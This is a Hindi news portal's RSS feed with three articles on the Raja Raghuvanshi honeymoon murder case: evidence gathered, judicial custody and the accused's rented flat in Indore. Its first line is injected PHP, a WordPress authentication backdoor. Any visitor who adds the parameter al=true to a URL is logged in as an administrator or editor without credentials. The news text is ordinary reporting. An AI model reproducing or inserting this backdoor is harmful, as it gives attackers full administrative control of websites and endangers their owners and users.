// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); raja sonam – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Wed, 02 Jul 2025 08:46:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 राजा रघुवंशी की हत्या करने वाली सोनम सहित पांचों आरोपियों के खिलाफ पुलिस चार्जशीट कोर्ट में पेश करने में ज्यादा देर नहीं लगाएगी https://pratyushaashakinayikiran.com/?p=167986 Wed, 02 Jul 2025 08:46:00 +0000 https://pratyushaashakinayikiran.com/?p=167986 इंदौर 

इंदौर से शिलांग ले जाकर अपने पति राजा रघुवंशी की हत्या करने वाली सोनम और उसके प्रेमी सहित पांचों आरोपियों के खिलाफ पुलिस चार्जशीट कोर्ट में पेश करने में ज्यादा देर नहीं लगाएगी। वैसे तीन माह के भीतर चार्जशीट पेश करना होती है, लेकिन पुलिस ने पर्याप्त सबूत जुटा लिए है। इंदौर से बाद में प्राॅपर्टी ब्रोकर और गार्ड की पुलिस ने हिरासत में लिया है। उनकी गवाही भी इस हत्याकांड में अहम होगी, क्योकि उन्होंने सोनम व राज के कहने पर सबूत मिटाए थे।

पुलिस ने राजा के शव के पास से जो टी शर्ट और हथियार जब्त किए है। वे आरोपियों के खिलाफ अहम सबूत साबित होंगे। पुलिस ने उसकी फोरेंसिक जांच भी कराई है। उसकी रिपोर्ट भी पुलिस को मिल चुकी है। सोनम और तीनों आयोपियों ने जो दोपहिया वाहन किराए पर लिए थे। उनकी जीपीएस लोकेशन भी पुलिस के लिए एक अहम सबूत है,क्योकि हत्या के समय दोनो वाहनों की लोकेशन एक ही थी।

अब तक यह सबूत जुटाए

शिलांग पुलिस ने अब तक राजा हत्याकांड को लेकर रिवाल्वर, गहरे, जलाए गए बैग के अवशेष, हत्या में प्रयुक्त हथियार, आरोपियों के कपड़े सहित अन्य सबूत जुटाए है। आरोपी विशाल ने हत्या के समय जो शर्ट पहनी थी। उसे भी पुलिस ने उसके घर से जब्त किया है। विशाल ने ही राजा के सिर पर पहला वार किया था। आपको बता दें कि 23 मई को राजा रघुवंशी की सोनम सहित चार आरोपियों ने हत्या कर दी थी। शव को खाई में फेंक कर सोनम इंदौर आ गई थी। राज ने ही हत्या की साजिश रची थी, लेकिन वह शिलांग नहीं गया था।

 

]]>
राजा रघुवंशी हत्याकांड में सोनम-राज को 13 दिन की न्यायिक हिरासत, हत्या कबूली! https://pratyushaashakinayikiran.com/?p=165778 Sun, 22 Jun 2025 13:38:00 +0000 https://pratyushaashakinayikiran.com/?p=165778 इंदौर 
इंदौर के राजा रघुवंशी हत्याकांड में मुख्य आरोपी सोनम रघुवंशी और उनके प्रेमी राज कुशवाहा को राहत नहीं मिली। मेघालय के जिला सत्र न्यायालय ने  दोनों को 13 दिन की न्यायिक हिरासत में भेज दिया। सहायक लोक अभियोजक तुषार चंदा के अनुसार, जांच अधिकारी ने पुलिस हिरासत के बजाय न्यायिक हिरासत की मांग की थी, जिसे अदालत ने स्वीकार कर लिया। इस मामले में अन्य तीन आरोपियों आकाश राजपूत, विशाल सिंह चौहान और आनंद कुर्मी को पहले ही 14 दिन की न्यायिक हिरासत में भेजा जा चुका है। मेघालय पुलिस इस जटिल मामले की गहन जांच कर रही है, जिसमें नए साक्ष्य और रहस्य सामने आ रहे हैं।

राजा रघुवंशी इंदौर का व्यवसायी था, जिसकी हत्या 23 मई को मेघालय के सोहरा इलाके में हनीमून यात्रा के दौरान हुई थी। उनकी पत्नी सोनम रघुवंशी और उसके प्रेमी राज कुशवाहा सहित 5 लोगों को इस हत्या के लिए गिरफ्तार किया गया है। राजा का क्षत-विक्षत शव 2 जून को सोहरा के एक गहरे गड्ढे में वेई सॉडॉन्ग झरने के पास मिला था। पुलिस ने बताया कि हत्या की साजिश में सोनम और राज के बीच 200 से अधिक फोन कॉल्स का आदान-प्रदान हुआ। इसमें एक रहस्यमय संजय वर्मा नाम का व्यक्ति भी शामिल था, जो संभवतः राज कुशवाहा का उपनाम हो सकता है।
राजा रघुवंशी हत्या की जांच कहां तक पहुंची

रिपोर्ट के मुताबिक, राजा रघुवंशी की हत्या मामले ने कई सवाल खड़े किए हैं। विशेष रूप से सोनम की भूमिका को लेकर, जिसके बारे में राजा के परिवार का दावा है कि वह जांच को गुमराह कर रही है। राजा के भाई सचिन रघुवंशी और विपिन रघुवंशी ने मांग की है कि सोनम से और गहन पूछताछ की जाए ताकि हत्या के पीछे का पूरा सच सामने आए। मेघालय पुलिस ने बीते दिनों हत्या के दृश्य का रीक्रिएट किया था। साथ ही, एक दूसरा हथियार भी बरामद किया गया है।

गुरुवार को सोनम और राज की रिमांड दो दिन बढ़ी थी

मालूम हो कि राजा रघुवंशी हत्याकांड में गिरफ्तार किए गए पांचों आरोपियों की पुलिस रिमांड पूरी होने के बाद सभी को गुरुवार को कोर्ट में पेश किया गया था. इस दौरान पुलिस ने कोर्ट से आरोपियों की रिमांड बढ़ाने की मांग की. इसके बाद, कोर्ट ने सोनम और राज की रिमांड दो दिन के लिए बढ़ा दी.

वहीं, अन्य तीन आरोपियों को न्यायिक हिरासत में भेजने के आदेश दिए. कोर्ट में पेशी से पहले सोनम ने पति राजा रघुवंशी की मौत में अपनी भूमिका को स्वीकार कर लिया था.
प्रेमी के आमने-सामने की पूछताछ में सोनम ने कबूला जुर्म

मेघालय पुलिस ने जब उसके प्रेमी राज कुशवाह से उसका आमना-सामना कराकर पूछताछ की, तो उसने अपना जुर्म कबूल कर लिया. राजा रघुवंशी हत्याकांड में भाड़े के तीनों शूटर्स के बाद अब सोनम और राज को न्यायिक हिरासत में भेजने का मतलब है कि पुलिस को इन आरोपियों से अभी जितनी पूछताछ करनी थी, वो लगभग पूरी हो चुकी है. अब पुलिस मामले में चार्जशीट बनाने की कवायद में जुटेगी. 
23 मई को हनीमून मनाने आए इंदौर के कपल हुए थे लापता

राजा रघुवंशी (28) और उनकी पत्नी सोनम रघुवंशी (24) 23 मई को मेघालय के पूर्वी खासी हिल्स जिले के सोहरा (चेरापूंजी) में नोंग्रियाट गांव में एक होमस्टे से चेक आउट करने के कुछ घंटों बाद लापता हो गए थे. मामले की जांच के दौरान राजा रघुवंशी का शव बरामद किया गया था.
जांच में पता चला- सोनम ने ही कराई पति की हत्या, तीन शूटर भी पकड़े गए

इस मामले की जांच के दौरान गिरफ्तारी के बाद, सभी पांचों आरोपियों सोनम और चार अन्य सोनम का प्रेमी राज सिंह कुशवाह (21), आनंद सिंह कुर्मी (23), आकाश राजपूत (19) और विशाल सिंह चौहान (22) को 11 जून को शिलांग के जिला एवं सत्र न्यायालय में पेश किया गया. अदालत ने सभी पांचों आरोपियों को आठ दिन की पुलिस हिरासत में भेज दिया.

सोनम और राजा की शादी 11 मई को इंदौर (मध्य प्रदेश) में हुई थी और 20 मई को हनीमून के लिए दोनों गुवाहाटी होते हुए मेघालय पहुंचे थे.

राजा रघुवंशी हत्याकांड में सोनम रघुवंशी और राज कुशवाहा को न्यायिक हिरासत में भेज दिया गया है। पुलिस की ओर से रिमांड न मांगे जाने के बाद कोर्ट ने उन्हें न्यायिक हिरासत में भेजने का फैसला किया। सहायक लोक अभियोजक तुषार चंदा ने बताया, 'अदालत ने दोनों आरोपियों को 13 दिन की न्यायिक हिरासत में भेज दिया है। पुलिस ने हिरासत की मांग नहीं की थी। जांच अधिकारी ने न्यायिक हिरासत की मांग की थी। अदालत ने 13 दिन की न्यायिक हिरासत मंजूर की।'

राजा रघुवंशी के भाई सचिन रघुवंशी ने कहा कि मेघालय पुलिस 'उनकी रिमांड आठ दिन से भी नहीं बढ़ा पाई। राज ने अभी तक यह नहीं बताया है कि उसने हत्या क्यों की। राज चाहता तो सोनम के साथ पहले ही भाग सकता था। उन्हें राजा की हत्या क्यों करनी पड़ी? क्या मेघालय पुलिस उनसे डरती है? क्या वे इतने बड़े गैंगस्टर हैं? मुझे यह सब समझ में नहीं आता। मैं नार्को टेस्ट की मांग करते-करते थक गया हूं। अगर नार्को टेस्ट नहीं हुआ तो मैं हाईकोर्ट और सुप्रीम कोर्ट भी जाऊंगा। हमें अभी भी समझ में नहीं आ रहा है कि उन्होंने मेरे भाई की हत्या क्यों की?'

राजा के भाई ने कहा- सोनम ने मर्डर की वजह नहीं बताई राजा रघुवंशी के भाई सचिन ने कहा- यह समझ नहीं आया कि जिस मेघालय पुलिस को इन्होंने बदनाम कर दिया था, वह उनकी रिमांड नहीं बढ़वा पाई। सोनम ने अभी तक राजा के मर्डर की वजह नहीं बताई है। राज 15-20 हजार रुपए महीना कमाता था, वह चाहता तो सोनम को पहले ही लेकर भाग जाता। उन्होंने हत्या क्यों की? मेघालय पुलिस भी डर गई क्या उन लोगों से? क्या वो इतनी बड़ी गैंग है?

सचिन ने कहा- नार्को टेस्ट की मांग करते-करते मैं थक गया हूं। मुझे ये हजम नहीं हो रहा है कि उन्हें जेल भेज दिया गया है। अब नार्को टेस्ट के लिए जहां जरूरत होगी, हाई कोर्ट-सुप्रीम कोर्ट…मैं सब जगह जाऊंगा। राजा की हत्या करने का उद्देश्य समझ नहीं आ रहा है। क्या उसको मारना ही आरोपियों का मकसद था? मुझे लगता है कि तंत्र-मंत्र के लिए ही ऐसा किया गया।

सोनम के पिता को ढांढस बंधाता दिख रहा राज उधर, मामले में एक और सीसीटीवी फुटेज सामने आया है। ये सीसीटीवी फुटेज उस दिन का है, जिस दिन राजा का शव मेघालय से इंदौर उसके घर लाया गया था। राजा के घर के फुटेज में हत्या का आरोपी राज कुशवाह भी दिख रहा है। उसने कफन जैसा एक सफेद कपड़ा भी किसी को दिया। राज हार-फूल भी लेकर आया था।

राज सोनम के पिता देवी सिंह के साथ नजर आ रहा है। वह देवी सिंह को बार-बार ढांढस बंधाता दिख रहा है, जबकि उसे पहले से ही इस वारदात की जानकारी थी। इसके बावजूद वह राजा के अंतिम संस्कार में शामिल हुआ। सीसीटीवी में नजर आ रहा है कि वह कॉल पर भी किसी से बात कर रहा है। पुलिस को शंका है कि वह यहां हो रही गतिविधियों की जानकारी किसी को कॉल पर दे रहा है। इस बात का भी अंदेशा है कि वह राजा के घर की पूरी जानकारी सोनम को दे रहा हो।

राजा-सोनम की शादी से शव लाने तक का घटनाक्रम बता दें, 11 मई को राजा रघुवंशी की सोनम के साथ शादी हुई थी। शादी के बाद 12 मई को सोनम राजा के घर पर आई थी। चौथे दिन 15 मई को वह अपने मायके चली गई थी। 17 मई को राजा के साथ उज्जैन में एक शादी समारोह में शामिल होने गई थी। इसके बाद 20 मई को राजा और सोनम अपने-अपने घर से मेघालय जाने के लिए एयरपोर्ट के लिए निकल गए। 2 जून को राजा रघुवंशी का शव खाई में मिला था। 3 जून को उसका पोस्टमॉर्टम हुआ, जिसमें राजा की हत्या पेड़ काटने वाले हथियार से होने की पुष्टि हुई थी। 4 जून को राजा का शव इंदौर स्थित उसके घर लाया गया था।

2 जून को मिली थी राजा की लाश, गाजीपुर में सोनम ने किया था सरेंडर

इंदौर के व्यवसायी राजा रघुवंशी का क्षत-विक्षत शव 2 जून को पूर्वी खासी हिल्स जिले के सोहरा-चेरापूंजी इलाके में वेई सावडोंग पार्किंग स्थल के नीचे एक खाई से बरामद किया गया था. मामले में जांच आगे बढ़ी तो शक की सुई सोनम की तरफ घूमी. इसी बीच सोनम ने यूपी के गाजीपुर में पुलिस के सामने आत्मसमर्पण कर दिया. पुलिस की जांच में खुलासा हुआ है कि इस घटना के पीछे सोनम मास्टरमाइंड थी.

]]>
राजा की हत्या के बाद आरोपी विशाल ने इंदौर में किराए पर लिया था फ्लैट, बड़ा खुलासा https://pratyushaashakinayikiran.com/?p=163738 Sat, 14 Jun 2025 10:39:00 +0000 https://pratyushaashakinayikiran.com/?p=163738 इंदौर 

राजा रघुवंशी हत्या मामले में लगातार कई खुलासे होते जा रहे हैं. अब मध्य प्रदेश इंदौर में संपत्ति प्रबंधन कारोबार से जुड़े एक व्यक्ति ने शुक्रवार को दावा किया कि मेघालय के राजा रघुवंशी हत्याकांड के एक आरोपी ने वारदात के हफ्ते भर बाद मध्यप्रदेश के इस शहर में उससे एक फ्लैट किराये पर लिया था. 

मेघालय में हनीमून मनाने गए राजा रघुवंशी (29) की साजिशन हत्या में शामिल होने के आरोप में उनकी पत्नी सोनम (25) (Sonam Raghuvanshi) और उसके कथित प्रेमी राज कुशवाह (20) (Raj Kushwaha) समेत पांच लोगों को गिरफ्तार किया गया है. रघुवंशी पूर्वोत्तर के इस सूबे में 23 मई को लापता हो गए थे और ऐसा माना जा रहा है कि इसी तारीख को उनकी हत्या कर दी गई थी. 

भाड़े के हत्यारे नहीं… दोस्त? 

राजा रघुवंशी हत्याकांड में गिरफ्तार तीन अन्य आरोपियों-विशाल चौहान, आकाश राजपूत और आनंद कुर्मी पर शुरुआत में 'भाड़े के हत्यारे' होने का संदेह जताया गया था, लेकिन मेघालय पुलिस अब इन्हें कुशवाह के दोस्त बता रही है. देश भर में चर्चा का केंद्र बने हत्याकांड के पांचों आरोपी फिलहाल मेघालय पुलिस की हिरासत में हैं.

विशाल ने किराए पर लिया था फ्लैट

फ्लैट किराए पर देने वाले सिलोम जैम्स ने मीडिया से बातचीत में बताया कि 20 मई की रात विशाल फ्लैट लेने पहुंचा था। युवक के एक्शन से सब कुछ सामान्य लगा, इसलिए चाबी सौंप दी गई। बाद में विशाल ने देर रात फ्लैट में प्रवेश करने की बात कही, लेकिन उसके बाद कई दिनों तक उसने संपर्क नहीं किया।

फ्लैट में कौन रुका जानकारी नहीं

सिलोम जैम्स ने कहा कि इसके बाद फ्लैट में सोनम रघुवंशी या कोई अन्य रूका की नहीं, इसकी जानकारी नहीं है। सिलोम ने कहा कि काम में व्यस्त रहने पर इस तरफ ध्यान नहीं गया। लेकिन जब किसी दोस्त ने जानकारी दी कि आपके किराए पर दिए फ्लैट में सोनम के रहने की बात सामने आ रही है। तब मैंने जाकर एग्रीमेंट देखा तो पता चला कि उसके (सोनम) साथी विशाल सिंह के नाम पर फ्लैट है। सिलोम ने कहा कि ना तो वह सोनम से मिले है ना उसको देखा है। ना मुझे मालूम है कि वह यहां रह के गई है की नहीं गई है।

शिलांग पुलिस कर रही आरोपियों से पूछताछ

इस हत्याकांड में अब तक की जांच में सोनम रघुवंशी (राजा की पत्नी), राज कुशवाहा, विशाल चौहान, आकाश राजपूत और आनंद कुर्मी की संलिप्तता सामने आई है। 2 जून को मेघालय के शिलांग स्थित घाटी में राजा रघुवंशी का शव बरामद होने के बाद यह मामला उजागर हुआ। 9 जून को पुलिस ने सोनम को उत्तर प्रदेश के गाजीपुर से गिरफ्तार किया। सभी आरोपियों को फिलहाल शिलांग पुलिस की कस्टडी में भेजा गया है, जहां उनसे पूछताछ की जा रही है।

पुलिस का मानना है कि यह हत्या पूर्व नियोजित साजिश का हिस्सा थी। फ्लैट बुकिंग, किराया भुगतान, और शिलांग जाने से पहले की गतिविधियां इस ओर इशारा करती हैं कि घटना को अंजाम देने के लिए आरोपियों ने महीनों पहले तैयारी की थी। पुलिस अब तकनीकी सबूतों और कॉल डिटेल्स के आधार पर पूरे नेटवर्क की तह तक जाने की कोशिश कर रही है।

 

30 मई को किराए पर लिया फ्लैट

इंदौर में संपत्ति प्रबंधन की एक फर्म चलाने वाले कारोबारी शिलोम जेम्स ने संवाददाताओं को बताया कि राजा रघुवंशी की हत्या के आरोपियों में शामिल चौहान ने 30 मई को उनसे मुलाकात करके शहर के देवास नाका क्षेत्र में 17,000 रुपये प्रति माह पर एक फ्लैट किराए पर लिया था और इसके लिए अनुबंध पर दस्तखत भी किए थे. 

जिस इमारत में फ्लैट है वह नई है और उसमें अभी तक सीसीटीवी नहीं लगे हैं. मैंने पुलिस को चौहान द्वारा इस फ्लैट को किराए पर लेने के बारे में सूचित किया था. आपको बता दें कि राजा और सोनम की शादी 11 मई को हुई थी और वे 20 मई को अपने हनीमून के लिए मेघालय चले गए थे. 

वहीं, मेघालय के पूर्वी खासी हिल्स जिले में राजा के लापता होने के बाद 23 मई को शुरू हुई जांच में उसकी पत्नी सोनम पर ध्यान केंद्रीत किया गया. जिसके बाद उसे उत्तर प्रदेश के गाजीपुर से गिरफ्तार कर लिया गया. रघुवंशी हत्याकांड में सोनम के प्रेमी राज कुशवाह, विशाल चौहान, आनंद कुर्मी और आकाश राजपूत को भी गिरफ्तार किया गया है.

फिलहाल इस वक्त सभी पांचों आरोपी मेघालय पुलिस की गिरफ्त में हैं. पूछताछ में सोनम ने कबूल लिया है कि वह राजा रघुवंशी हत्याकांड में शामिल थी. आपको बता दें कि पति राजा की हत्या के बाद सोनम इंदौर भी पहुंची थी और इसी फ्लैट में रुकी थी. 

]]>